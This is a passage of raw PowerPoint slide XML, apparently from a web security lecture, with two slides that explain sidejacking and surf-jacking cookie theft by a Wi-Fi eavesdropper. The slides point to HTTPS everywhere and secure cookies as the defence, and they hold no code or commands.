              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B3F218-B3B7-714C-8A87-6D1B580BF15B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7066866" y="5970103"/>
                  <a:ext cx="146520" cy="38880"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301890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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF7F7CDC-FB4E-CE4D-96E0-00856C4F4851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cookie Theft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>SideJacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Content Placeholder 3" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63AF7E58-B5BA-3148-8889-959E57B61BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Network eavesdropper steals cookies sent over a wireless connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Case 1: website uses HTTPS for login, the rest of the session is unencrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Only works if cookies are not marked as “secure” (why?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Case 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accidental HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP downgrade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Laptop sees Wi-Fi hotspot, tries HTTPS to Web mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>This fails because first sees hotspot’s welcome page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Now try HTTP… with unencrypted cookie attached!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Eavesdropper gets the cookie – user’s mail is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2F3D4B-7318-DA49-AAFF-485EE1F60DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982397" y="5934346"/>
            <a:ext cx="3571812" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>also Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Firesheep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing clipart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E470838B-A766-A344-9F7C-7214AFD9D3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9634683" y="4435671"/>
            <a:ext cx="927871" cy="1116963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94047154-DA5F-7147-B94B-2DE90C29493F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20354036">
            <a:off x="8705874" y="4266603"/>
            <a:ext cx="2528256" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTTPS everywhere!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1195793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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF7F7CDC-FB4E-CE4D-96E0-00856C4F4851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="642594"/>
            <a:ext cx="10567182" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cookie Theft: Surf Jacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5135D3A6-21B9-8A42-A228-DEFF33D0A664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8826345" y="1910603"/>
            <a:ext cx="1469075" cy="1371601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297D7E81-B6E0-E343-AC35-71A202077FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8997266" y="3391131"/>
            <a:ext cx="1127232" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10" descr="User with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{348205DF-FE23-7F47-A4B6-6F0B69B711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2376" y="3282204"/>
            <a:ext cx="1127232" cy="1127232"/>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52B18BF1-6F49-6943-A9DD-BBB9EDB71265}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4999127" y="2622628"/>
              <a:ext cx="3245040" cy="982080"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Ink 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B18BF1-6F49-6943-A9DD-BBB9EDB71265}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4981487" y="2604628"/>
                <a:ext cx="328068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55D9A193-57E6-E544-9B20-3F77AAFBAB8C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8122487" y="2678068"/>
              <a:ext cx="86400" cy="209160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Ink 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D9A193-57E6-E544-9B20-3F77AAFBAB8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8104487" y="2660068"/>
                <a:ext cx="1220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5DA044D9-A6D0-D545-BCDF-0092C1082204}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5160767" y="3049588"/>
              <a:ext cx="3085920" cy="837000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Ink 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA044D9-A6D0-D545-BCDF-0092C1082204}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5143127" y="3031948"/>
                <a:ext cx="3121560" cy="87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AAB59AF8-DD22-5B4E-A3BB-092A221ED230}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5157887" y="3868228"/>
              <a:ext cx="528480" cy="200880"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Ink 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB59AF8-DD22-5B4E-A3BB-092A221ED230}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId12"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5139887" y="3850228"/>
                <a:ext cx="564120" cy="236520"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF9A8F1-00F2-924D-AAA4-FF153B5B18FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200007" y="2642955"/>
            <a:ext cx="1829347" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705B878F-FB5E-1D47-AE55-3F07EFAF8313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268545" y="3551802"/>
            <a:ext cx="814647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 4" descr="Devil Icons Matt - Free vector graphic on Pixabay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57BDB908-E43B-5D40-977A-FFA0175A98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7044" y="4843807"/>
            <a:ext cx="990886" cy="7763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8138396-C5D4-1348-A6F7-9A5BF2D7E4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9143139" y="4550213"/>
            <a:ext cx="981359" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26144D3E-1683-9049-A1FC-CED6D012FAA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7357073" y="5674637"/>
            <a:ext cx="1786066" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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E5EC1E89-BE5B-7444-AA2B-C36149F5928E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5273807" y="4431268"/>
              <a:ext cx="3638520" cy="288360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="Ink 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EC1E89-BE5B-7444-AA2B-C36149F5928E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5255807" y="4413628"/>
                <a:ext cx="36741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A990A33B-A305-6147-B691-CAA6EDA0B697}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8500127" y="4726828"/>
              <a:ext cx="370440" cy="21960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Ink 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A990A33B-A305-6147-B691-CAA6EDA0B697}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8482487" y="4708828"/>
                <a:ext cx="406080" cy="57600"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C13BF1-0764-2D49-A967-AB98CCFC018C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6227648" y="4045313"/>
            <a:ext cx="1593706" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6864968-602F-8A47-B373-6972EF9D1D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5200007" y="4651228"/>
            <a:ext cx="2139840" cy="393480"/>
            <a:chOff x="3117988" y="4651228"/>
            <a:chExt cx="2139840" cy="393480"/>
          </a:xfrm>
        </p:grpSpPr>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48C07F33-2BC8-B84F-BC6B-C632B80E9512}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3117988" y="4693348"/>
                <a:ext cx="2139840" cy="351360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C07F33-2BC8-B84F-BC6B-C632B80E9512}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3100348" y="4675348"/>
                  <a:ext cx="217548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6CBD901E-4C22-4B49-A14A-CDBDEC5C398E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3147508" y="4651228"/>
                <a:ext cx="243720" cy="40320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CBD901E-4C22-4B49-A14A-CDBDEC5C398E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3129868" y="4633228"/>
                  <a:ext cx="279360" cy="75960"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A98589-3270-944B-8823-02182069649A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298469" y="5020702"/>
            <a:ext cx="2803366" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>301 (“Moved Permanently”) </a:t>
            </a:r>
